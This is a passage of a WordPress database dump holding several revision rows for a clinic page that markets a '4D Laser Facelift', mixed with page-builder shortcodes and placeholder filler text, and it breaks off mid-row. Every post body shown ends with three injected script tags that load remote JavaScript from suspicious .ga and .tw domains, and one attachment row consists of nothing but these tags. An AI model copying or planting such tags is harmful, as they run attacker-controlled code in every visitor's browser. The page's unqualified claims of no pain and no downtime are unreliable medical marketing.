Non-Ablative Method: 4D Laser Facelift, We can restore You to more youthful appearance to the skin of the face and neck.\r\n\r\nUnlike any other laser treatments, 4D Laser Facelift are more dynamism and does not require any surgical procedures. The synergistic laser treatments treat both the exterior of the face as well as the interior oral cavity to produce results from both inside and out. With 4 unique laser modes : Smooth, Frac3, Piano, and SupErficial, 4D Laser Facelift can provides immediate and ongoing results.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<ul>\r\n 	<li>SMOOTH</li>\r\n</ul>\r\nThis is the first step of the procedure and conducted on the inside of the oral cavity. This non-ablative laser will give the impacts on cheeks and lips and results in tightening, volumizing and restoring collagen starting from the inside out. This reduces the depth of the nasolabial and melomental folds, and help restore lip volume.\r\n<ul>\r\n 	<li>FRAC3</li>\r\n</ul>\r\nIn this second step, The Fractional beam is applied to the exterior of the face that targets deeper imperfections to restore a youthful texture and tone to the skin.\r\n<ul>\r\n 	<li>PIANO</li>\r\n</ul>\r\nWith a deep penetration of bulk tissue heating, this step will promote skin elasticity and tighten. This restores existing collagen and activates new collagen generation.\r\n<ul>\r\n 	<li>SupEficial</li>\r\n</ul>\r\nThe final step is used lastly to significantly improves skin smoothness, reduces skin surface irregularities and imperfections with an extremely controlled light peel. This step gives the skin a smoother pearl finish.\r\n\r\nThis treatment only performed once and does not require any recovery period. Medikpro wants to bring You into a new revolutionary method of laser rejuvenation and introduce You to a unique technology for the reconstruction of the facial skin. There is no pain and no downtime. You can continue Your daily activities right after treatment.[/vc_column_text][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_cascading_images image_1_url=\"6634\" image_1_offset_x_sign=\"+\" image_1_offset_x=\"0%\" image_1_offset_y_sign=\"-\" image_1_offset_y=\"55%\" image_1_rotate_sign=\"+\" image_1_rotate=\"none\" image_1_animation=\"Grow In\" image_1_box_shadow=\"none\" image_2_offset_x_sign=\"+\" image_2_offset_x=\"50%\" image_2_offset_y_sign=\"+\" image_2_offset_y=\"35%\" image_2_rotate_sign=\"+\" image_2_rotate=\"none\" image_2_animation=\"Grow In\" image_2_box_shadow=\"none\" image_3_offset_x_sign=\"-\" image_3_offset_x=\"35%\" image_3_offset_y_sign=\"+\" image_3_offset_y=\"30%\" image_3_rotate_sign=\"+\" image_3_rotate=\"none\" image_3_animation=\"Grow In\" image_3_box_shadow=\"x_large_depth\" image_4_offset_x_sign=\"+\" image_4_offset_x=\"0%\" image_4_offset_y_sign=\"+\" image_4_offset_y=\"0%\" image_4_rotate_sign=\"+\" image_4_rotate=\"none\" image_4_animation=\"Fade In\" image_4_box_shadow=\"none\" border_radius=\"none\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-10-percent\" column_padding_position=\"all\" background_color=\"#f4f4f4\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_custom_heading text=\"Our Company Values\" font_container=\"tag:h5|text_align:left|color:%23bfbfbf\" use_theme_fonts=\"yes\" css=\".vc_custom_1486408368541{margin-bottom: 10px !important;}\"][vc_custom_heading text=\"Creator of quality designs and thinker of fresh ideas.\" font_container=\"tag:h2|font_size:40|text_align:left|line_height:50px\" use_theme_fonts=\"yes\"][vc_custom_heading text=\"Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. A small river named Duden flows by their place and supplies it with the necessary regelialia\" font_container=\"tag:p|text_align:left|color:rgba(10%2C10%2C10%2C0.6)\" use_theme_fonts=\"yes\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" background_image=\"https://source.unsplash.com/Nj0mCM6nikI\" enable_bg_scale=\"true\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" background_image=\"https://source.unsplash.com/nvzvOPQW0gc\" enable_bg_scale=\"true\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][vc_column column_padding=\"padding-10-percent\" column_padding_position=\"all\" background_color=\"#ffffff\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_custom_heading text=\"A Little Of Our Story\" font_container=\"tag:h5|text_align:left|color:%23bfbfbf\" use_theme_fonts=\"yes\" css=\".vc_custom_1486408382586{margin-bottom: 10px !important;}\"][vc_custom_heading text=\"We were simply born to paint pixels for a living\" font_container=\"tag:h2|font_size:40|text_align:left|line_height:50px\" use_theme_fonts=\"yes\"][vc_custom_heading text=\"Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. A small river named Duden flows by their place and supplies it with the necessary regelialia\" font_container=\"tag:p|text_align:left|color:rgba(10%2C10%2C10%2C0.6)\" use_theme_fonts=\"yes\"][nectar_btn size=\"large\" button_style=\"see-through-2\" hover_text_color_override=\"#ffffff\" icon_family=\"none\" url=\"#\" text=\"See Our Story\" margin_top=\"30\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','4D Laser Face Lifting','','inherit','closed','closed','','6370-revision-v1','','','2018-01-11 01:53:36','2018-01-11 01:53:36','',6370,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6370-revision-v1/',0,'revision','',0),(6643,1,'2018-01-11 01:55:42','2018-01-11 01:55:42','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_cascading_images image_1_url=\"6247\" image_1_offset_x_sign=\"+\" image_1_offset_x=\"0%\" image_1_offset_y_sign=\"-\" image_1_offset_y=\"55%\" image_1_rotate_sign=\"+\" image_1_rotate=\"none\" image_1_animation=\"Grow In\" image_1_box_shadow=\"none\" image_2_offset_x_sign=\"+\" image_2_offset_x=\"50%\" image_2_offset_y_sign=\"+\" image_2_offset_y=\"35%\" image_2_rotate_sign=\"+\" image_2_rotate=\"none\" image_2_animation=\"Grow In\" image_2_box_shadow=\"none\" image_3_offset_x_sign=\"-\" image_3_offset_x=\"35%\" image_3_offset_y_sign=\"+\" image_3_offset_y=\"30%\" image_3_rotate_sign=\"+\" image_3_rotate=\"none\" image_3_animation=\"Grow In\" image_3_box_shadow=\"x_large_depth\" image_4_offset_x_sign=\"+\" image_4_offset_x=\"0%\" image_4_offset_y_sign=\"+\" image_4_offset_y=\"0%\" image_4_rotate_sign=\"+\" image_4_rotate=\"none\" image_4_animation=\"Fade In\" image_4_box_shadow=\"none\" border_radius=\"none\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]As a result of ageing, the skin loses its elasticity and firmness, also becomes flabby and dull and wrinkles begin to appear. But, with Our Non-Invasive and Non-Ablative Method: 4D Laser Facelift, We can restore You to more youthful appearance to the skin of the face and neck.\r\n\r\nUnlike any other laser treatments, 4D Laser Facelift are more dynamism and does not require any surgical procedures. The synergistic laser treatments treat both the exterior of the face as well as the interior oral cavity to produce results from both inside and out. With 4 unique laser modes : Smooth, Frac3, Piano, and SupErficial, 4D Laser Facelift can provides immediate and ongoing results.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<ul>\r\n 	<li>SMOOTH</li>\r\n</ul>\r\nThis is the first step of the procedure and conducted on the inside of the oral cavity. This non-ablative laser will give the impacts on cheeks and lips and results in tightening, volumizing and restoring collagen starting from the inside out. This reduces the depth of the nasolabial and melomental folds, and help restore lip volume.\r\n<ul>\r\n 	<li>FRAC3</li>\r\n</ul>\r\nIn this second step, The Fractional beam is applied to the exterior of the face that targets deeper imperfections to restore a youthful texture and tone to the skin.\r\n\r\n[/vc_column_text][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_cascading_images image_1_url=\"6634\" image_1_offset_x_sign=\"+\" image_1_offset_x=\"0%\" image_1_offset_y_sign=\"-\" image_1_offset_y=\"55%\" image_1_rotate_sign=\"+\" image_1_rotate=\"none\" image_1_animation=\"Grow In\" image_1_box_shadow=\"none\" image_2_offset_x_sign=\"+\" image_2_offset_x=\"50%\" image_2_offset_y_sign=\"+\" image_2_offset_y=\"35%\" image_2_rotate_sign=\"+\" image_2_rotate=\"none\" image_2_animation=\"Grow In\" image_2_box_shadow=\"none\" image_3_offset_x_sign=\"-\" image_3_offset_x=\"35%\" image_3_offset_y_sign=\"+\" image_3_offset_y=\"30%\" image_3_rotate_sign=\"+\" image_3_rotate=\"none\" image_3_animation=\"Grow In\" image_3_box_shadow=\"x_large_depth\" image_4_offset_x_sign=\"+\" image_4_offset_x=\"0%\" image_4_offset_y_sign=\"+\" image_4_offset_y=\"0%\" image_4_rotate_sign=\"+\" image_4_rotate=\"none\" image_4_animation=\"Fade In\" image_4_box_shadow=\"none\" border_radius=\"none\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6634\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<ul>\r\n 	<li>PIANO</li>\r\n</ul>\r\nWith a deep penetration of bulk tissue heating, this step will promote skin elasticity and tighten. This restores existing collagen and activates new collagen generation.\r\n<ul>\r\n 	<li>SupEficial</li>\r\n</ul>\r\nThe final step is used lastly to significantly improves skin smoothness, reduces skin surface irregularities and imperfections with an extremely controlled light peel. This step gives the skin a smoother pearl finish.\r\n\r\nThis treatment only performed once and does not require any recovery period. Medikpro wants to bring You into a new revolutionary method of laser rejuvenation and introduce You to a unique technology for the reconstruction of the facial skin. There is no pain and no downtime. You can continue Your daily activities right after treatment.[/vc_column_text][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','4D Laser Face Lifting','','inherit','closed','closed','','6370-revision-v1','','','2018-01-11 01:55:42','2018-01-11 01:55:42','',6370,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6370-revision-v1/',0,'revision','',0),(6644,1,'2018-01-11 01:56:22','2018-01-11 01:56:22','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','dg','','inherit','open','closed','','dg','','','2018-01-11 01:56:22','2018-01-11 01:56:22','',6370,'http://sandbox.futuremediatrix.com/medikpro/wp-content/uploads/2018/01/dg.jpg',0,'attachment','image/jpeg',0),(6645,1,'2018-01-11 01:56:38','2018-01-11 01:56:38','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6247\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]As a result of ageing, the skin loses its elasticity and firmness, also becomes flabby and dull and wrinkles begin to appear. But, with Our Non-Invasive and Non-Ablative Method: 4D Laser Facelift, We can restore You to more youthful appearance to the skin of the face and neck.\r\n\r\nUnlike any other laser treatments, 4D Laser Facelift are more dynamism and does not require any surgical procedures. The synergistic laser treatments treat both the exterior of the face as well as the interior oral cavity to produce results from both inside and out. With 4 unique laser modes : Smooth, Frac3, Piano, and SupErficial, 4D Laser Facelift can provides immediate and ongoing results.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<ul>\r\n 	<li>SMOOTH</li>\r\n</ul>\r\nThis is the first step of the procedure and conducted on the inside of the oral cavity. This non-ablative laser will give the impacts on cheeks and lips and results in tightening, volumizing and restoring collagen starting from the inside out. This reduces the depth of the nasolabial and melomental folds, and help restore lip volume.\r\n<ul>\r\n 	<li>FRAC3</li>\r\n</ul>\r\nIn this second step, The Fractional beam is applied to the exterior of the face that targets deeper imperfections to restore a youthful texture and tone to the skin.\r\n\r\n[/vc_column_text][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6644\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6634\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<ul>\r\n 	<li>PIANO</li>\r\n</ul>\r\nWith a deep penetration of bulk tissue heating, this step will promote skin elasticity and tighten. This restores existing collagen and activates new collagen generation.\r\n<ul>\r\n 	<li>SupEficial</li>\r\n</ul>\r\nThe final step is used lastly to significantly improves skin smoothness, reduces skin surface irregularities and imperfections with an extremely controlled light peel. This step gives the skin a smoother pearl finish.\r\n\r\nThis treatment only performed once and does not require any recovery period. Medikpro wants to bring You into a new revolutionary method of laser rejuvenation and introduce You to a unique technology for the reconstruction of the facial skin. There is no pain and no downtime. You can continue Your daily activities right after treatment.[/vc_column_text][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','4D Laser Face Lifting','','inherit','closed','closed','','6370-revision-v1','','','2018-01-11 01:56:38','2018-01-11 01:56:38','',6370,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6370-revision-v1/',0,'revision','',0),(6646,1,'2018-01-11 01:56:57','2018-01-11 01:56:57','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6247\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]As a result of ageing, the skin loses its elasticity and firmness, also becomes flabby and dull and wrinkles begin to appear. But, with Our Non-Invasive and Non-Ablative Method: 4D Laser Facelift, We can restore You to more youthful appearance to the skin of the face and neck.\r\n\r\nUnlike any other laser treatments, 4D Laser Facelift are more dynamism and does not require any surgical procedures. The synergistic laser treatments treat both the exterior of the face as well as the interior oral cavity to produce results from both inside and out. With 4 unique laser modes : Smooth, Frac3, Piano, and SupErficial, 4D Laser Facelift can provides immediate and ongoing results.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_color=\"#666666\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<ul>\r\n 	<li>SMOOTH</li>\r\n</ul>\r\nThis is the first step of the procedure and conducted on the inside of the oral cavity. This non-ablative laser will give the impacts on cheeks and lips and results in tightening, volumizing and restoring collagen starting from the inside out. This reduces the depth of the nasolabial and melomental folds, and help restore lip volume.\r\n<ul>\r\n 	<li>FRAC3</li>\r\n</ul>\r\nIn this second step, The Fractional beam is applied to the exterior of the face that targets deeper imperfections to restore a youthful texture and tone to the skin.\r\n\r\n[/vc_column_text][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6644\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6634\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<ul>\r\n 	<li>PIANO</li>\r\n</ul>\r\nWith a deep penetration of bulk tissue heating, this step will promote skin elasticity and tighten. This restores existing collagen and activates new collagen generation.\r\n<ul>\r\n 	<li>SupEficial</li>\r\n</ul>\r\nThe final step is used lastly to significantly improves skin smoothness, reduces skin surface irregularities and imperfections with an extremely controlled light peel. This step gives the skin a smoother pearl finish.\r\n\r\nThis treatment only performed once and does not require any recovery period. Medikpro wants to bring You into a new revolutionary method of laser rejuvenation and introduce You to a unique technology for the reconstruction of the facial skin. There is no pain and no downtime. You can continue Your daily activities right after treatment.[/vc_column_text][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','4D Laser Face Lifting','','inherit','closed','closed','','6370-revision-v1','','','2018-01-11 01:56:57','2018-01-11 01:56:57','',6370,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6370-revision-v1/',0,'revision','',0),(6647,1,'2018-01-11 02:36:23','2018-01-11 02:36:23','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6247\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]As a result of ageing, the skin loses its elasticity and firmness, also becomes flabby and dull and wrinkles begin to appear. But, with Our Non-Invasive and Non-Ablative Method: 4D Laser Facelift, We can restore You to more youthful appearance to the skin of the face and neck.\r\n\r\nUnlike any other laser treatments, 4D Laser Facelift are more dynamism and does not require any surgical procedures. The synergistic laser treatments treat both the exterior of the face as well as the interior oral cavity to produce results from both inside and out. With 4 unique laser modes : Smooth, Frac3, Piano, and SupErficial, 4D Laser Facelift can provides immediate and ongoing results.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_color=\"#bec7ce\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<ul>\r\n 	<li>SMOOTH</li>\r\n</ul>\r\nThis is the first step of the procedure and conducted on the inside of the oral cavity. This non-ablative laser will give the impacts on cheeks and lips and results in tightening, volumizing and restoring collagen starting from the inside out. This reduces the depth of the nasolabial and melomental folds, and help restore lip volume.\r\n<ul>\r\n 	<li>FRAC3</li>\r\n</ul>\r\nIn this second step, The Fractional beam is applied to the exterior of the face that targets deeper imperfections to restore a youthful texture and tone to the skin.\r\n\r\n[/vc_column_text][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6644\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" 